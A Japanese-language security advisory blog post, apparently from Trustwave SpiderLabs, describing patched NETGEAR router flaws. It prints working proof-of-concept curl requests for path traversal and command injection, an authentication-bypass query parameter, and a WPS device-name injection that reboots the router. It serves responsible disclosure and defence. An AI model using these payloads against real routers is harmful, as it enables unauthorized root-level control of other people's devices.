昨年私は、NETGEAR 製品の複数の脆弱性を発見しました。これらの脆弱性に関する情報の開 示プロセスが終了し、さらにパッチが適用されましたので、今では技術的な詳細について述べるこ とができます。
TWSL2018-002: 一部のルーターおよびモデム・ルーターでのパスワードリカバリーとファイルア クセス
Trustwave SpiderLabs Advisory: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-002/?fid=10670
NETGEAR advisory: https://kb.netgear.com/000045848/Security-Advisory-for-Password-Recovery-and-File-Access-on-Some-Routers-and-Modem-Routers-PSV-2017-0677
ルータの中には、ファイルへのパスがわかっていれば、デバイスからの任意のファイルの読み取り を許可するものがあります。ファームウェア 1.0.2.86 以前が搭載されている Nighthawk X8 に対す る概念実証:
curl -d "id=304966648&next_file=cgi-bin/../../tmp/mnt/usb0/part1/README.txt" http://192.168.1.1/genie_restoring.cgi?id=304966648
T上記は、ルータに挿入された USB メモリにある README.txt ファイルを取得します。合計 17 の 製品が影響を受けます。具体的なモデルはアドバイザリーノートに記載されています。
TWSL2018-003: 発見事象 1: 一部のルーターおよびモデム・ルーターでの認証後のコマンドイン ジェクション
Trustwave SpiderLabs Advisory: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-003/?fid=10671
NETGEAR advisory: https://kb.netgear.com/000045850/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-and-Modem-Routers-PSV-2017-1207
これは、NETGEAR のアドバイザリーによると 6 つの製品に影響します。lan.cgi ページの device_name パラメータを使用してルートレベルの OS コマンドを実行すると発生すること:
curl -d "action=Apply&device_name=A%22+%26%26+touch+%2Ftmp%2Fjimmers+%26%26+echo+%22B&sysLANIPAddr1=192&sysLANIPAddr2=168&sysLANIPAddr3=1&sysLANIPAddr4=1&sysLANSubnetMask1=255&sysLANSubnetMask2=255&sysLANSubnetMask3=255&sysLANSubnetMask4=0&rip_direction=1&sysRIPVersion=Disabled&dhcp_server=dhcp_server&sysPoolStartingAddr4=2&sysPoolFinishAddr4=254&select=-1&arp_enable=disable&ipmac_token=0&dev_name=R8500mge&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&rip_enable=0&rip_multicast=1" http://192.168.1.1/lan.cgi?id=988337b27ba1f3cdc280e454860f8b10d84e42da
この攻撃には認証が必要であることに注目してください。
TWSL2018-003: 発見事象 2: 一部のルーターまたはモデム・ルーターでの認証バイパス
NETGEAR advisory: https://kb.netgear.com/000048998/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-or-Modem-Routers-PSV-2017-1208
これはまた、多数の製品(合計 17 個)に影響を及ぼし、悪用するのは簡単です。クエリ文字列内 に ”&genie = 1” がある場合、認証はバイパスされます。
TWSL2018-003: 連鎖攻撃: 一部のルーターおよびモデム・ルーターに対するコマンドインジェク ション
NETGEAR advisory: https://kb.netgear.com/000048999/Security-Advisory-for-Command-Injection-on-Some-Routers-and-Modem-Routers-PSV-2017-1209
同じ製品が影響を受けます。これは 3 つの別々の問題を利用した 3 段階の攻撃です:CSRF トー クンリカバリーの脆弱性(助けとなるツール: https://github.com/SpiderLabs/advisories-poc/blob/master/TWSL2018-003/csrf.c)と TWSL2018-003 での 2 つの発見事象。その結果、 ルーターに接続されているユーザーは、資格情報を提供せずに、デバイスのルートとして OS コマ ンドを実行できます。
TWSL2018-004: D7000, EX6200v2、および一部のルータでのコマンドインジェクションの脆弱 性
Trustwave SpiderLabs Advisory: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-004/?fid=10672
NETGEAR advisory: https://kb.netgear.com/000049354/Security-Advisory-for-Command-Injection-Vulnerability-on-D7000-EX6200v2-and-Some-Routers-PSV-2017-2181
6 つの製品のみが影響を受けます。これにより、WPS がアクティブになっている短時間の間に root として OS コマンドを実行できます。証明するには、あなたの Linux ボックスの /etc/wpa_supplicant.conf ファイルに次の行を追加し、ルータで初期化された WPS に参加してみ てください。
(Nighthawk X4S):
device_name=MR" /sbin/reboot "
ルータの再起動を観察してください!これは、WPS の一部として実行される内部コードがホスト名 をサニタイズできないために発生します。
Trustwave SpiderLabs は、これらの脆弱性が確実に対処されていることを確認するため、当社 の責任ある開示プロセスを通じて NETGEAR 社と協力してきました。NETGEAR 社に感謝すると ともに、コミュニケーション能力の高い PSIRT チームに感謝したいと思います。 バグ発見に対する 報奨制度 を彼らが採用することは、このような問題に対処するための内部プロセスを改善するの に役立っていることは明らかです。
NETGEAR 社のアドバイザリページでルータモデルに該当するファームウェアを確認し、影響を受 けるデバイスにパッチが適用されていることを確認してください。